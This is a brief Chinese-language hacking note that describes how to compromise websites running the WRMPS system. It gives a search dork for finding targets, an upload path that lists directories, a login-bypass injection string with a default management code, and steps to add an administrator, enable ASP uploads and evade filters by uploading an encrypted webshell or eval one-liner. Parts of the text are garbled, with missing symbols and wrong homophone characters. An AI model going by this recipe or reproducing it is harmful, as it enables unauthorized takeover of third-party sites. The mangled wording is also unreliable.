通杀,杀官方
搜:Powered By WRMPS
1.注册列目录
Plus/UpLoad/uploadfile.aspType1
adminManageCodeWRMPS6&admina' or '1''1&passa' or '1''1&flag,&FlagGroup0
有些后台不须要认证码ManageCode默认WRMPS6,假如改了就只能猜了.
进了后盾,增加治理员,增添上传类型ASP, 上传过滤了某些特别代码,wscript.shell,execute之类的,直接传加密的马或者传eval的一句话就能够了.